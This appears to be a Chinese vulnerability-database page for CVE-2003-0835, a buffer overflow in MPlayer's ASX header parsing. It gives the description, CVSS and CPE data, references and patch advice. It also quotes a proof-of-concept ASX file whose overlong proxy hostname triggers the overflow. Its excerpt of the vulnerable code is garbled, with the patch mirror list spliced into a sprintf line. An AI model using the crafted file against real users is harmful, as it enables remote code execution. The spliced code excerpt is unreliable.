CVE-2003-0835
CVSS7.5
发布时间 :2003-11-17 00:00:00
修订时间 :2016-10-17 22:37:44
NMCOES    

[原文]Multiple buffer overflows in asf_http_request of MPlayer before 0.92 allows remote attackers to execute arbitrary code via an ASX header with a long hostname.


[CNNVD]MPlayer流ASX头字段解析缓冲区溢出漏洞(CNNVD-200311-069)

        
        MPlayer是一款基于Linux的电影播放程序。
        MPLayer在处理畸形流ASX文件头字段时存在问题,远程攻击者可以利用这个漏洞诱使用户访问畸形ASX文件,触发缓冲区溢出。
        问题是asf_streaming.c文件中包含的asf_http_request函数缺少正确的边界缓冲区检查,问题代码如下:
        asf_http_request {
         char str[250];
         ....
         ...
         ..
         sprintf( str, "Host: 厂商补丁:
        MPlayer
        -------
        下载MPlayer 0.92或者最新CVS更新修正了此漏洞:
        Hungary 1, HTTP ->
        http://www1.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2

        Hungary 1, FTP -> ftp://ftp1.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
        Hungary 2, HTTP ->
        http://www2.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2

        Hungary 2, FTP -> ftp://ftp2.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
        USA, HTTP ->
        http://ftp3.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2

        USA, FTP -> ftp://ftp3.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
        Switzerland, HTTP ->
        http://www4.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2

        USA2, HTTP ->
        http://ftp5.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2

        USA2, FTP -> ftp://ftp5.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
        Australia, FTP -> ftp://ftp6.mplayerhq.hu/pub/mplayer/releases/MPlayer-0.92.tar.bz2
        Finland, HTTP ->
        http://www7.mplayerhq.hu/pub/mplayer/releases/MPlayer-0.92.tar.bz2
:%d", server_url->hostname,
         server_url->port );
         ....
         ...
         ..
         sprintf( str, "Host: :%d", url->hostname, url->port );
         ....
         ...
         ..
         }
        由于MAXHOSTLEN对主机长度进行了限制,看起来不可利用,但是如果使用包含"badsite" 监听"badport"的ASX文件,可触发缓冲区溢出,精心构建请求ASX文件,并诱使用户解析,可导致以用户进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:mplayer:mplayer:0.90_pre
cpe:/a:mplayer:mplayer:0.90_rc4
cpe:/a:mplayer:mplayer:0.90
cpe:/a:mplayer:mplayer:1.0_pre1
cpe:/a:mplayer:mplayer:0.91
cpe:/a:mplayer:mplayer:0.90_rc

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0835
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0835
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-069
(官方数据源) CNNVD

- 其它链接及资源

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000760
(UNKNOWN)  CONECTIVA  CLA-2003:760
http://marc.info/?l=bugtraq&m=106454257221455&w=2
(UNKNOWN)  BUGTRAQ  20030925 MPlayer Security Advisory #01: Remotely exploitable buffer overflow
http://marc.info/?l=bugtraq&m=106460912721618&w=2
(UNKNOWN)  BUGTRAQ  20030926 Mplayer Buffer Overflow
http://marc.info/?l=bugtraq&m=106485005213109&w=2
(UNKNOWN)  BUGTRAQ  20030929 GLSA: media-video/mplayer (200309-15)
http://www.mplayerhq.hu/homepage/design6/news.html
(UNKNOWN)  CONFIRM  http://www.mplayerhq.hu/homepage/design6/news.html

- 漏洞信息

MPlayer流ASX头字段解析缓冲区溢出漏洞
高危 边界条件错误
2003-11-17 00:00:00 2005-10-20 00:00:00
远程  
        
        MPlayer是一款基于Linux的电影播放程序。
        MPLayer在处理畸形流ASX文件头字段时存在问题,远程攻击者可以利用这个漏洞诱使用户访问畸形ASX文件,触发缓冲区溢出。
        问题是asf_streaming.c文件中包含的asf_http_request函数缺少正确的边界缓冲区检查,问题代码如下:
        asf_http_request {
         char str[250];
         ....
         ...
         ..
         sprintf( str, "Host: 厂商补丁:
        MPlayer
        -------
        下载MPlayer 0.92或者最新CVS更新修正了此漏洞:
        Hungary 1, HTTP ->
        http://www1.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2

        Hungary 1, FTP -> ftp://ftp1.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
        Hungary 2, HTTP ->
        http://www2.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2

        Hungary 2, FTP -> ftp://ftp2.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
        USA, HTTP ->
        http://ftp3.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2

        USA, FTP -> ftp://ftp3.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
        Switzerland, HTTP ->
        http://www4.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2

        USA2, HTTP ->
        http://ftp5.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2

        USA2, FTP -> ftp://ftp5.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
        Australia, FTP -> ftp://ftp6.mplayerhq.hu/pub/mplayer/releases/MPlayer-0.92.tar.bz2
        Finland, HTTP ->
        http://www7.mplayerhq.hu/pub/mplayer/releases/MPlayer-0.92.tar.bz2
:%d", server_url->hostname,
         server_url->port );
         ....
         ...
         ..
         sprintf( str, "Host: :%d", url->hostname, url->port );
         ....
         ...
         ..
         }
        由于MAXHOSTLEN对主机长度进行了限制,看起来不可利用,但是如果使用包含"badsite" 监听"badport"的ASX文件,可触发缓冲区溢出,精心构建请求ASX文件,并诱使用户解析,可导致以用户进程权限在系统上执行任意指令。
        

- 公告与补丁

        

- 漏洞信息 (23186)

MPlayer 0.9/1.0 Streaming ASX Header Parsing Buffer Overrun Vulnerability (EDBID:23186)
linux remote
2003-09-25 Verified
0 Otero Hernan
N/A [点击下载]
source: http://www.securityfocus.com/bid/8702/info

A vulnerability has been discovered in MPLayer when handling malformed streaming ASX file headers. The problem occurs due to insufficient bounds checking performed within asf_http_request(). It has been demonstrated that it is possible for a remote attacker to provide a malicious streaming ASX file that will overrun the bounds of a reserved buffer, when a vulnerable version of MPlayer is used to interpret the file. Remote arbitrary code execution has been confirmed possible.

 <asx version = "3.0">
 <title>Bas Site ASX</title>

 <moreinfo href = "mailto:info@badsite.com
 <mailto:info@badsite.com> " />
 <logo href = "http://www.badsite.com/streaming/grupo.gif
 <http://www.badsite.com/streaming/grupo.gif> " style="ICON" />
 <banner href= "images/bannermitre.gif">
 <abstract>Bad Site live</abstract>
 <moreinfo target="_blank" href = "http://www.badsite.com/
 <http://www.badsite.com/> " />
 </banner>

 <entry>
 <title>NEWS</title>
 <AUTHOR>NEWS</AUTHOR>
 <COPYRIGHT>� All by the news</COPYRIGHT>
 <ref href =
"http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaa"/>
 <logo href = "http://www.badsite.com/streaming/grupo.gif
 <http://badsite.com/streaming/grupo.gif> " style="ICON" />
 </entry>
 </asx>


		

- 漏洞信息

2609
MPlayer ASX Streaming Overflow
Input Manipulation
Loss of Integrity Upgrade
Vendor Verified

- 漏洞描述

- 时间线

2003-09-26 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 0.92.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

MPlayer Streaming ASX Header Parsing Buffer Overrun Vulnerability
Boundary Condition Error 8702
Yes No
2003-09-25 12:00:00 2009-07-11 11:56:00
Discovery of this vulnerability has been credited to "Otero, Hernan" <hernan.otero@eds.com>.

- 受影响的程序版本

MPlayer MPlayer 1.0 pre1
MPlayer MPlayer 0.91
+ Mandriva Linux Mandrake 9.2
MPlayer MPlayer 0.90 rc series
MPlayer MPlayer 0.90 pre series
MPlayer MPlayer 0.90
MPlayer MPlayer 0.9 0rc4
+ Mandriva Linux Mandrake 9.1
MPlayer MPlayer 1.0 pre1
MPlayer MPlayer 0.92

- 不受影响的程序版本

MPlayer MPlayer 1.0 pre1
MPlayer MPlayer 0.92

- 漏洞讨论

A vulnerability has been discovered in MPLayer when handling malformed streaming ASX file headers. The problem occurs due to insufficient bounds checking performed within asf_http_request(). It has been demonstrated that it is possible for a remote attacker to provide a malicious streaming ASX file that will overrun the bounds of a reserved buffer, when a vulnerable version of MPlayer is used to interpret the file. Remote arbitrary code execution has been confirmed possible.

- 漏洞利用

The following proof of concept has been supplied:

- 解决方案

This issue has been addressed in the latest CVS update as well as in MPlayer 0.92.

Gentoo has released a security advisory to address this issue. Affected users are advised to execute the following commands to update vulnerable systems:

emerge sync
emerge media-video/mplayer-0.92
emerge clean

Mandrake has released an advisory that contains fixes that address this issue. Updates can be applied automatically via MandrakeUpdate or urpmi. Manual fixes have also been provided.


MPlayer MPlayer 0.9 0rc4

MPlayer MPlayer 0.90

MPlayer MPlayer 0.90 pre series

MPlayer MPlayer 0.90 rc series

MPlayer MPlayer 0.91

MPlayer MPlayer 1.0 pre1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站